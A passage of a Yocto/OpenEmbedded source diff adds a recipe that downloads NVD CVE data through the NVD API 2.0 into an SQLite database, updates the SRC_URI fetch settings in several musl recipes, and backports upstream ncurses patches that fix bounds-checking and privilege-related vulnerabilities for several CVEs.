105 # Update success, set the date to cve_check file. 170 # Update success, set the date to cve_check file.
106 if year == date.today().year: 171 if year == date.today().year:
107 cve_f.write('CVE database update : %s\n\n' % date.today()) 172 cve_f.write('CVE database update : %s\n\n' % date.today())
108 173
109 conn.commit() 174 conn.commit()
110 conn.close() 175 conn.close()
111} 176 return True
112 177
113do_populate_cve_db[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" 178def initialize_db(conn):
179 with conn:
180 c = conn.cursor()
114 181
115def initialize_db(c): 182 c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
116 c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
117 183
118 c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \ 184 c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
119 SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)") 185 SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
120 186
121 c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \ 187 c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
122 VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \ 188 VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
123 VERSION_END TEXT, OPERATOR_END TEXT)") 189 VERSION_END TEXT, OPERATOR_END TEXT)")
124 c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);") 190 c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
125 191
126def parse_node_and_insert(c, node, cveId): 192 c.close()
193
194def parse_node_and_insert(conn, node, cveId):
127 # Parse children node if needed 195 # Parse children node if needed
128 for child in node.get('children', ()): 196 for child in node.get('children', ()):
129 parse_node_and_insert(c, child, cveId) 197 parse_node_and_insert(conn, child, cveId)
130 198
131 def cpe_generator(): 199 def cpe_generator():
132 for cpe in node.get('cpe_match', ()): 200 for cpe in node.get('cpe_match', ()):
133 if not cpe['vulnerable']: 201 if not cpe['vulnerable']:
134 return 202 return
135 cpe23 = cpe['cpe23Uri'].split(':') 203 cpe23 = cpe.get('cpe23Uri')
204 if not cpe23:
205 return
206 cpe23 = cpe23.split(':')
207 if len(cpe23) < 6:
208 return
136 vendor = cpe23[3] 209 vendor = cpe23[3]
137 product = cpe23[4] 210 product = cpe23[4]
138 version = cpe23[5] 211 version = cpe23[5]
139 212
213 if cpe23[6] == '*' or cpe23[6] == '-':
214 version_suffix = ""
215 else:
216 version_suffix = "_" + cpe23[6]
217
140 if version != '*' and version != '-': 218 if version != '*' and version != '-':
141 # Version is defined, this is a '=' match 219 # Version is defined, this is a '=' match
142 yield [cveId, vendor, product, version, '=', '', ''] 220 yield [cveId, vendor, product, version + version_suffix, '=', '', '']
143 elif version == '-': 221 elif version == '-':
144 # no version information is available 222 # no version information is available
145 yield [cveId, vendor, product, version, '', '', ''] 223 yield [cveId, vendor, product, version, '', '', '']
@@ -173,9 +251,9 @@ def parse_node_and_insert(c, node, cveId):
173 # Save processing by representing as -. 251 # Save processing by representing as -.
174 yield [cveId, vendor, product, '-', '', '', ''] 252 yield [cveId, vendor, product, '-', '', '', '']
175 253
176 c.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()) 254 conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
177 255
178def update_db(c, jsondata): 256def update_db(conn, jsondata):
179 import json 257 import json
180 root = json.loads(jsondata) 258 root = json.loads(jsondata)
181 259
@@ -199,15 +277,14 @@ def update_db(c, jsondata):
199 accessVector = accessVector or "UNKNOWN" 277 accessVector = accessVector or "UNKNOWN"
200 cvssv3 = 0.0 278 cvssv3 = 0.0
201 279
202 c.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)", 280 conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
203 [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]) 281 [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
204 282
205 configurations = elt['configurations']['nodes'] 283 configurations = elt['configurations']['nodes']
206 for config in configurations: 284 for config in configurations:
207 parse_node_and_insert(c, config, cveId) 285 parse_node_and_insert(conn, config, cveId)
208 286
209 287
210addtask do_populate_cve_db before do_fetch 288do_fetch[nostamp] = "1"
211do_populate_cve_db[nostamp] = "1"
212 289
213EXCLUDE_FROM_WORLD = "1" 290EXCLUDE_FROM_WORLD = "1"
diff --git a/meta/recipes-core/meta/cve-update-nvd2-native.bb b/meta/recipes-core/meta/cve-update-nvd2-native.bb
new file mode 100644
index 0000000000..1a3eeba6d0
--- /dev/null
+++ b/meta/recipes-core/meta/cve-update-nvd2-native.bb
@@ -0,0 +1,372 @@
1SUMMARY = "Updates the NVD CVE database"
2LICENSE = "MIT"
3
4# Important note:
5# This product uses the NVD API but is not endorsed or certified by the NVD.
6
7INHIBIT_DEFAULT_DEPS = "1"
8
9inherit native
10
11deltask do_unpack
12deltask do_patch
13deltask do_configure
14deltask do_compile
15deltask do_install
16deltask do_populate_sysroot
17
18NVDCVE_URL ?= "https://services.nvd.nist.gov/rest/json/cves/2.0"
19
20# If you have a NVD API key (https://nvd.nist.gov/developers/request-an-api-key)
21# then setting this to get higher rate limits.
22NVDCVE_API_KEY ?= ""
23
24# CVE database update interval, in seconds. By default: once a day (24*60*60).
25# Use 0 to force the update
26# Use a negative value to skip the update
27CVE_DB_UPDATE_INTERVAL ?= "86400"
28
29# CVE database incremental update age threshold, in seconds. If the database is
30# older than this threshold, do a full re-download, else, do an incremental
31# update. By default: the maximum allowed value from NVD: 120 days (120*24*60*60)
32# Use 0 to force a full download.
33CVE_DB_INCR_UPDATE_AGE_THRES ?= "10368000"
34
35# Number of attempts for each http query to nvd server before giving up
36CVE_DB_UPDATE_ATTEMPTS ?= "5"
37
38CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_2.db"
39
40python () {
41 if not bb.data.inherits_class("cve-check", d):
42 raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
43}
44
45python do_fetch() {
46 """
47 Update NVD database with API 2.0
48 """
49 import bb.utils
50 import bb.progress
51 import shutil
52
53 bb.utils.export_proxies(d)
54
55 db_file = d.getVar("CVE_CHECK_DB_FILE")
56 db_dir = os.path.dirname(db_file)
57 db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
58
59 cleanup_db_download(db_file, db_tmp_file)
60 # By default let's update the whole database (since time 0)
61 database_time = 0
62
63 # The NVD database changes once a day, so no need to update more frequently
64 # Allow the user to force-update
65 try:
66 import time
67 update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
68 if update_interval < 0:
69 bb.note("CVE database update skipped")
70 return
71 if time.time() - os.path.getmtime(db_file) < update_interval:
72 bb.note("CVE database recently updated, skipping")
73 return
74 database_time = os.path.getmtime(db_file)
75
76 except OSError:
77 pass
78
79 bb.utils.mkdirhier(db_dir)
80 if os.path.exists(db_file):
81 shutil.copy2(db_file, db_tmp_file)
82
83 if update_db_file(db_tmp_file, d, database_time) == True:
84 # Update downloaded correctly, can swap files
85 shutil.move(db_tmp_file, db_file)
86 else:
87 # Update failed, do not modify the database
88 bb.warn("CVE database update failed")
89 os.remove(db_tmp_file)
90}
91
92do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
93do_fetch[file-checksums] = ""
94do_fetch[vardeps] = ""
95
96def cleanup_db_download(db_file, db_tmp_file):
97 """
98 Cleanup the download space from possible failed downloads
99 """
100
101 # Clean up the updates done on the main file
102 # Remove it only if a journal file exists - it means a complete re-download
103 if os.path.exists("{0}-journal".format(db_file)):
104 # If a journal is present the last update might have been interrupted. In that case,
105 # just wipe any leftovers and force the DB to be recreated.
106 os.remove("{0}-journal".format(db_file))
107
108 if os.path.exists(db_file):
109 os.remove(db_file)
110
111 # Clean-up the temporary file downloads, we can remove both journal
112 # and the temporary database
113 if os.path.exists("{0}-journal".format(db_tmp_file)):
114 # If a journal is present the last update might have been interrupted. In that case,
115 # just wipe any leftovers and force the DB to be recreated.
116 os.remove("{0}-journal".format(db_tmp_file))
117
118 if os.path.exists(db_tmp_file):
119 os.remove(db_tmp_file)
120
121def nvd_request_wait(attempt, min_wait):
122 return min ( ( (2 * attempt) + min_wait ) , 30)
123
124def nvd_request_next(url, attempts, api_key, args, min_wait):
125 """
126 Request next part of the NVD database
127 NVD API documentation: https://nvd.nist.gov/developers/vulnerabilities
128 """
129
130 import urllib.request
131 import urllib.parse
132 import gzip
133 import http
134 import time
135
136 request = urllib.request.Request(url + "?" + urllib.parse.urlencode(args))
137 if api_key:
138 request.add_header("apiKey", api_key)
139 bb.note("Requesting %s" % request.full_url)
140
141 for attempt in range(attempts):
142 try:
143 r = urllib.request.urlopen(request)
144
145 if (r.headers['content-encoding'] == 'gzip'):
146 buf = r.read()
147 raw_data = gzip.decompress(buf).decode("utf-8")
148 else:
149 raw_data = r.read().decode("utf-8")
150
151 r.close()
152
153 except Exception as e:
154 wait_time = nvd_request_wait(attempt, min_wait)
155 bb.note("CVE database: received error (%s)" % (e))
156 bb.note("CVE database: retrying download after %d seconds. attempted (%d/%d)" % (wait_time, attempt+1, attempts))
157 time.sleep(wait_time)
158 pass
159 else:
160 return raw_data
161 else:
162 # We failed at all attempts
163 return None
164
165def update_db_file(db_tmp_file, d, database_time):
166 """
167 Update the given database file
168 """
169 import bb.utils, bb.progress
170 import datetime
171 import sqlite3
172 import json
173
174 # Connect to database
175 conn = sqlite3.connect(db_tmp_file)
176 initialize_db(conn)
177
178 req_args = {'startIndex' : 0}
179
180 incr_update_threshold = int(d.getVar("CVE_DB_INCR_UPDATE_AGE_THRES"))
181 if database_time != 0:
182 database_date = datetime.datetime.fromtimestamp(database_time, tz=datetime.timezone.utc)
183 today_date = datetime.datetime.now(tz=datetime.timezone.utc)
184 delta = today_date - database_date
185 if incr_update_threshold == 0:
186 bb.note("CVE database: forced full update")
187 elif delta < datetime.timedelta(seconds=incr_update_threshold):
188 bb.note("CVE database: performing partial update")
189 # The maximum range for time is 120 days
190 if delta > datetime.timedelta(days=120):
191 bb.error("CVE database: Trying to do an incremental update on a larger than supported range")
192 req_args['lastModStartDate'] = database_date.isoformat()
193 req_args['lastModEndDate'] = today_date.isoformat()
194 else:
195 bb.note("CVE database: file too old, forcing a full update")
196 else:
197 bb.note("CVE database: no preexisting database, do a full download")
198
199 with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
200
201 bb.note("Updating entries")
202 index = 0
203 url = d.getVar("NVDCVE_URL")
204 api_key = d.getVar("NVDCVE_API_KEY") or None
205 attempts = int(d.getVar("CVE_DB_UPDATE_ATTEMPTS"))
206
207 # Recommended by NVD
208 wait_time = 6
209 if api_key:
210 wait_time = 2
211
212 while True:
213 req_args['startIndex'] = index
214 raw_data = nvd_request_next(url, attempts, api_key, req_args, wait_time)
215 if raw_data is None:
216 # We haven't managed to download data
217 return False
218
219 data = json.loads(raw_data)
220
221 index = data["startIndex"]
222 total = data["totalResults"]
223 per_page = data["resultsPerPage"]
224 bb.note("Got %d entries" % per_page)
225 for cve in data["vulnerabilities"]:
226 update_db(conn, cve)
227
228 index += per_page
229 ph.update((float(index) / (total+1)) * 100)
230 if index >= total:
231 break
232
233 # Recommended by NVD
234 time.sleep(wait_time)
235
236 # Update success, set the date to cve_check file.
237 cve_f.write('CVE database update : %s\n\n' % datetime.date.today())
238
239 conn.commit()
240 conn.close()
241 return True
242
243def initialize_db(conn):
244 with conn:
245 c = conn.cursor()
246
247 c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
248
249 c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
250 SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
251
252 c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
253 VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
254 VERSION_END TEXT, OPERATOR_END TEXT)")
255 c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
256
257 c.close()
258
259def parse_node_and_insert(conn, node, cveId):
260
261 def cpe_generator():
262 for cpe in node.get('cpeMatch', ()):
263 if not cpe['vulnerable']:
264 return
265 cpe23 = cpe.get('criteria')
266 if not cpe23:
267 return
268 cpe23 = cpe23.split(':')
269 if len(cpe23) < 6:
270 return
271 vendor = cpe23[3]
272 product = cpe23[4]
273 version = cpe23[5]
274
275 if cpe23[6] == '*' or cpe23[6] == '-':
276 version_suffix = ""
277 else:
278 version_suffix = "_" + cpe23[6]
279
280 if version != '*' and version != '-':
281 # Version is defined, this is a '=' match
282 yield [cveId, vendor, product, version + version_suffix, '=', '', '']
283 elif version == '-':
284 # no version information is available
285 yield [cveId, vendor, product, version, '', '', '']
286 else:
287 # Parse start version, end version and operators
288 op_start = ''
289 op_end = ''
290 v_start = ''
291 v_end = ''
292
293 if 'versionStartIncluding' in cpe:
294 op_start = '>='
295 v_start = cpe['versionStartIncluding']
296
297 if 'versionStartExcluding' in cpe:
298 op_start = '>'
299 v_start = cpe['versionStartExcluding']
300
301 if 'versionEndIncluding' in cpe:
302 op_end = '<='
303 v_end = cpe['versionEndIncluding']
304
305 if 'versionEndExcluding' in cpe:
306 op_end = '<'
307 v_end = cpe['versionEndExcluding']
308
309 if op_start or op_end or v_start or v_end:
310 yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
311 else:
312 # This is no version information, expressed differently.
313 # Save processing by representing as -.
314 yield [cveId, vendor, product, '-', '', '', '']
315
316 conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
317
318def update_db(conn, elt):
319 """
320 Update a single entry in the on-disk database
321 """
322
323 accessVector = None
324 cveId = elt['cve']['id']
325 if elt['cve']['vulnStatus'] == "Rejected":
326 c = conn.cursor()
327 c.execute("delete from PRODUCTS where ID = ?;", [cveId])
328 c.execute("delete from NVD where ID = ?;", [cveId])
329 c.close()
330 return
331 cveDesc = ""
332 for desc in elt['cve']['descriptions']:
333 if desc['lang'] == 'en':
334 cveDesc = desc['value']
335 date = elt['cve']['lastModified']
336 try:
337 accessVector = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['accessVector']
338 cvssv2 = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['baseScore']
339 except KeyError:
340 cvssv2 = 0.0
341 cvssv3 = None
342 try:
343 accessVector = accessVector or elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['attackVector']
344 cvssv3 = elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['baseScore']
345 except KeyError:
346 pass
347 try:
348 accessVector = accessVector or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['attackVector']
349 cvssv3 = cvssv3 or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['baseScore']
350 except KeyError:
351 pass
352 accessVector = accessVector or "UNKNOWN"
353 cvssv3 = cvssv3 or 0.0
354
355 conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
356 [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
357
358 try:
359 # Remove any pre-existing CVE configuration. Even for partial database
360 # update, those will be repopulated. This ensures that old
361 # configuration is not kept for an updated CVE.
362 conn.execute("delete from PRODUCTS where ID = ?", [cveId]).close()
363 for config in elt['cve']['configurations']:
364 # This is suboptimal as it doesn't handle AND/OR and negate, but is better than nothing
365 for node in config["nodes"]:
366 parse_node_and_insert(conn, node, cveId)
367 except KeyError:
368 bb.note("CVE %s has no configurations" % cveId)
369
370do_fetch[nostamp] = "1"
371
372EXCLUDE_FROM_WORLD = "1"
diff --git a/meta/recipes-core/musl/libucontext_git.bb b/meta/recipes-core/musl/libucontext_git.bb
index ec988f1920..71beb80083 100644
--- a/meta/recipes-core/musl/libucontext_git.bb
+++ b/meta/recipes-core/musl/libucontext_git.bb
@@ -10,7 +10,7 @@ DEPENDS = ""
10 10
11PV = "0.10+${SRCPV}" 11PV = "0.10+${SRCPV}"
12SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561" 12SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561"
13SRC_URI = "git://github.com/kaniini/libucontext \ 13SRC_URI = "git://github.com/kaniini/libucontext;branch=master;protocol=https \
14" 14"
15 15
16S = "${WORKDIR}/git" 16S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/musl/musl-obstack.bb b/meta/recipes-core/musl/musl-obstack.bb
index 3003935fe5..74de48c2cd 100644
--- a/meta/recipes-core/musl/musl-obstack.bb
+++ b/meta/recipes-core/musl/musl-obstack.bb
@@ -10,7 +10,7 @@ SECTION = "libs"
10 10
11PV = "1.1" 11PV = "1.1"
12SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4" 12SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4"
13SRC_URI = "git://github.com/pullmoll/musl-obstack" 13SRC_URI = "git://github.com/pullmoll/musl-obstack;branch=master;protocol=https"
14 14
15UPSTREAM_CHECK_COMMITS = "1" 15UPSTREAM_CHECK_COMMITS = "1"
16 16
diff --git a/meta/recipes-core/musl/musl-utils.bb b/meta/recipes-core/musl/musl-utils.bb
index dd0ce33061..c30509469c 100644
--- a/meta/recipes-core/musl/musl-utils.bb
+++ b/meta/recipes-core/musl/musl-utils.bb
@@ -11,7 +11,7 @@ SECTION = "utils"
11PV = "20170421" 11PV = "20170421"
12 12
13SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d" 13SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d"
14SRC_URI = "git://github.com/boltlinux/musl-utils" 14SRC_URI = "git://github.com/boltlinux/musl-utils;branch=master;protocol=https"
15 15
16UPSTREAM_CHECK_COMMITS = "1" 16UPSTREAM_CHECK_COMMITS = "1"
17 17
diff --git a/meta/recipes-core/musl/musl_git.bb b/meta/recipes-core/musl/musl_git.bb
index 82379fd1c5..cbb56f4769 100644
--- a/meta/recipes-core/musl/musl_git.bb
+++ b/meta/recipes-core/musl/musl_git.bb
@@ -12,7 +12,7 @@ PV = "${BASEVER}+git${SRCPV}"
12 12
13# mirror is at git://github.com/kraj/musl.git 13# mirror is at git://github.com/kraj/musl.git
14 14
15SRC_URI = "git://git.musl-libc.org/musl \ 15SRC_URI = "git://git.musl-libc.org/musl;branch=master \
16 file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \ 16 file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \
17 file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \ 17 file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \
18 " 18 "
diff --git a/meta/recipes-core/ncurses/files/CVE-2021-39537.patch b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
new file mode 100644
index 0000000000..7655200350
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
@@ -0,0 +1,30 @@
1$NetBSD: patch-ncurses_tinfo_captoinfo.c,v 1.1 2021/10/09 07:52:36 wiz Exp $
2
3Fix for CVE-2021-39537 from upstream:
4https://github.com/ThomasDickey/ncurses-snapshots/commit/63ca9e061f4644795d6f3f559557f3e1ed8c738b#diff-7e95c7bc5f213e9be438e69a9d5d0f261a14952bcbd692f7b9014217b8047340
5
6CVE: CVE-2021-39537
7Upstream-Status: Backport [http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/Attic/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup]
8Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
9
10--- a/ncurses/tinfo/captoinfo.c 2020-02-02 23:34:34.000000000 +0000
11+++ b/ncurses/tinfo/captoinfo.c
12@@ -216,12 +216,15 @@ cvtchar(register const char *sp)
13 }
14 break;
15 case '^':
16+ len = 2;
17 c = UChar(*++sp);
18- if (c == '?')
19+ if (c == '?') {
20 c = 127;
21- else
22+ } else if (c == '\0') {
23+ len = 1;
24+ } else {
25 c &= 0x1f;
26- len = 2;
27+ }
28 break;
29 default:
30 c = UChar(*sp);
diff --git a/meta/recipes-core/ncurses/files/CVE-2022-29458.patch b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
new file mode 100644
index 0000000000..eb1b7c96f9
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
@@ -0,0 +1,135 @@
1From 5f40697e37e195069f55528fc7a1d77e619ad104 Mon Sep 17 00:00:00 2001
2From: Dan Tran <dantran@microsoft.com>
3Date: Fri, 13 May 2022 13:28:41 -0700
4Subject: [PATCH] ncurses 6.3 before patch 20220416 has an out-of-bounds read
5 and segmentation violation in convert_strings in tinfo/read_entry.c in the
6 terminfo library.
7
8CVE: CVE-2022-29458
9Upstream-Status: Backport
10[https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1009870]
11
12Signed-off-by: Gustavo Lima Chaves <gustavo.chaves@microsoft.com>
13Signed-off-by: Dan Tran <dantran@microsoft.com>
14---
15 ncurses/tinfo/alloc_entry.c | 14 ++++++--------
16 ncurses/tinfo/read_entry.c | 25 +++++++++++++++++++------
17 2 files changed, 25 insertions(+), 14 deletions(-)
18
19diff --git a/ncurses/tinfo/alloc_entry.c b/ncurses/tinfo/alloc_entry.c
20index 4bf7d6c8..b49ad6aa 100644
21--- a/ncurses/tinfo/alloc_entry.c
22+++ b/ncurses/tinfo/alloc_entry.c
23@@ -48,13 +48,11 @@
24
25 #include <tic.h>
26
27-MODULE_ID("$Id: alloc_entry.c,v 1.64 2020/02/02 23:34:34 tom Exp $")
28+MODULE_ID("$Id: alloc_entry.c,v 1.69 2022/04/16 22:46:53 tom Exp $")
29
30 #define ABSENT_OFFSET -1
31 #define CANCELLED_OFFSET -2
32
33-#define MAX_STRTAB 4096 /* documented maximum entry size */
34-
35 static char *stringbuf; /* buffer for string capabilities */
36 static size_t next_free; /* next free character in stringbuf */
37
38@@ -71,8 +69,8 @@ _nc_init_entry(ENTRY * const tp)
39 }
40 #endif
41
42- if (stringbuf == 0)
43- TYPE_MALLOC(char, (size_t) MAX_STRTAB, stringbuf);
44+ if (stringbuf == NULL)
45+ TYPE_MALLOC(char, (size_t) MAX_ENTRY_SIZE, stringbuf);
46
47 next_free = 0;
48
49@@ -108,11 +106,11 @@ _nc_save_str(const char *const string)
50 * Cheat a little by making an empty string point to the end of the
51 * previous string.
52 */
53- if (next_free < MAX_STRTAB) {
54+ if (next_free < MAX_ENTRY_SIZE) {
55 result = (stringbuf + next_free - 1);
56 }
57- } else if (next_free + len < MAX_STRTAB) {
58- _nc_STRCPY(&stringbuf[next_free], string, MAX_STRTAB);
59+ } else if (next_free + len < MAX_ENTRY_SIZE) {
60+ _nc_STRCPY(&stringbuf[next_free], string, MAX_ENTRY_SIZE);
61 DEBUG(7, ("Saved string %s", _nc_visbuf(string)));
62 DEBUG(7, ("at location %d", (int) next_free));
63 next_free += len;
64diff --git a/ncurses/tinfo/read_entry.c b/ncurses/tinfo/read_entry.c
65index 5b570b0f..23c2cebc 100644
66--- a/ncurses/tinfo/read_entry.c
67+++ b/ncurses/tinfo/read_entry.c
68@@ -1,5 +1,5 @@
69 /****************************************************************************
70- * Copyright 2018-2019,2020 Thomas E. Dickey *
71+ * Copyright 2018-2021,2022 Thomas E. Dickey *
72 * Copyright 1998-2016,2017 Free Software Foundation, Inc. *
73 * *
74 * Permission is hereby granted, free of charge, to any person obtaining a *
75@@ -42,7 +42,7 @@
76
77 #include <tic.h>
78
79-MODULE_ID("$Id: read_entry.c,v 1.157 2020/02/02 23:34:34 tom Exp $")
80+MODULE_ID("$Id: read_entry.c,v 1.162 2022/04/16 21:00:00 tom Exp $")
81
82 #define TYPE_CALLOC(type,elts) typeCalloc(type, (unsigned)(elts))
83
84@@ -145,6 +145,7 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
85 {
86 int i;
87 char *p;
88+ bool corrupt = FALSE;
89
90 for (i = 0; i < count; i++) {
91 if (IS_NEG1(buf + 2 * i)) {
92@@ -154,8 +155,20 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
93 } else if (MyNumber(buf + 2 * i) > size) {
94 Strings[i] = ABSENT_STRING;
95 } else {
96- Strings[i] = (MyNumber(buf + 2 * i) + table);
97- TR(TRACE_DATABASE, ("Strings[%d] = %s", i, _nc_visbuf(Strings[i])));
98+ int nn = MyNumber(buf + 2 * i);
99+ if (nn >= 0 && nn < size) {
100+ Strings[i] = (nn + table);
101+ TR(TRACE_DATABASE, ("Strings[%d] = %s", i,
102+ _nc_visbuf(Strings[i])));
103+ } else {
104+ if (!corrupt) {
105+ corrupt = TRUE;
106+ TR(TRACE_DATABASE,
107+ ("ignore out-of-range index %d to Strings[]", nn));
108+ _nc_warning("corrupt data found in convert_strings");
109+ }
110+ Strings[i] = ABSENT_STRING;
111+ }
112 }
113
114 /* make sure all strings are NUL terminated */
115@@ -776,7 +789,7 @@ _nc_read_tic_entry(char *filename,
116 * looking for compiled (binary) terminfo data.
117 *
118 * cgetent uses a two-level lookup. On the first it uses the given
119- * name to return a record containing only the aliases for an entry.
120+ * name to return a record containing only the aliases for an entry.
121 * On the second (using that list of aliases as a key), it returns the
122 * content of the terminal description. We expect second lookup to
123 * return data beginning with the same set of aliases.
124@@ -833,7 +846,7 @@ _nc_read_tic_entry(char *filename,
125 #endif /* NCURSES_USE_DATABASE */
126
127 /*
128- * Find and read the compiled entry for a given terminal type, if it exists.
129+ * Find and read the compiled entry for a given terminal type, if it exists.
130 * We take pains here to make sure no combination of environment variables and
131 * terminal type name can be used to overrun the file buffer.
132 */
133--
1342.36.1
135
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-29491.patch b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
new file mode 100644
index 0000000000..0a0497723f
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
@@ -0,0 +1,45 @@
1Backport of:
2
3Author: Sven Joachim <svenjoac@gmx.de>
4Description: Change the --disable-root-environ configure option behavior
5 By default, the --disable-root-environ option forbids program run by
6 the superuser to load custom terminfo entries. This patch changes
7 that to only restrict programs running with elevated privileges,
8 matching the behavior of the --disable-setuid-environ option
9 introduced in the 20230423 upstream patchlevel.
10Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1034372#29
11Bug: https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00018.html
12Forwarded: not-needed
13Last-Update: 2023-05-01
14
15Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/ncurses/6.2-0ubuntu2.1/ncurses_6.2-0ubuntu2.1.debian.tar.xz]
16CVE: CVE-2023-29491
17Signed-off-by: Virendra Thakur <virendrak@kpit.com>
18
19---
20 ncurses/tinfo/access.c | 2 --
21 1 file changed, 2 deletions(-)
22
23--- a/ncurses/tinfo/access.c
24+++ b/ncurses/tinfo/access.c
25@@ -178,15 +178,16 @@ _nc_is_file_path(const char *path)
26 NCURSES_EXPORT(int)
27 _nc_env_access(void)
28 {
29+ int result = TRUE;
30+
31 #if HAVE_ISSETUGID
32 if (issetugid())
33- return FALSE;
34+ result = FALSE;
35 #elif HAVE_GETEUID && HAVE_GETEGID
36 if (getuid() != geteuid()
37 || getgid() != getegid())
38- return FALSE;
39+ result = FALSE;
40 #endif
41- /* ...finally, disallow root */
42- return (getuid() != ROOT_UID) && (geteuid() != ROOT_UID);
43+ return result;
44 }
45 #endif
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-50495.patch b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
new file mode 100644
index 0000000000..58c23866d1
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
@@ -0,0 +1,79 @@
1Fix for CVE-2023-50495 from upstream:
2https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc
3
4Reference:
5https://invisible-island.net/archives/ncurses/6.4/ncurses-6.4-20230424.patch.gz
6
7Upstream-Status: Backport [import from suse ftp.pbone.net/mirror/ftp.opensuse.org/update/leap-micro/5.3/sle/src/ncurses-6.1-150000.5.20.1.src.rpm
8Upstream commit https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc]
9CVE: CVE-2023-50495
10Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
11---
12 ncurses/tinfo/parse_entry.c | 23 ++++++++++++++++-------
13 1 file changed, 16 insertions(+), 7 deletions(-)
14
15diff --git a/ncurses/tinfo/parse_entry.c b/ncurses/tinfo/parse_entry.c
16index 23574b66..56ba9ae6 100644
17--- a/ncurses/tinfo/parse_entry.c
18+++ b/ncurses/tinfo/parse_entry.c
19@@ -110,7 +110,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
20 /* Well, we are given a cancel for a name that we don't recognize */
21 return _nc_extend_names(entryp, name, STRING);
22 default:
23- return 0;
24+ return NULL;
25 }
26
27 /* Adjust the 'offset' (insertion-point) to keep the lists of extended
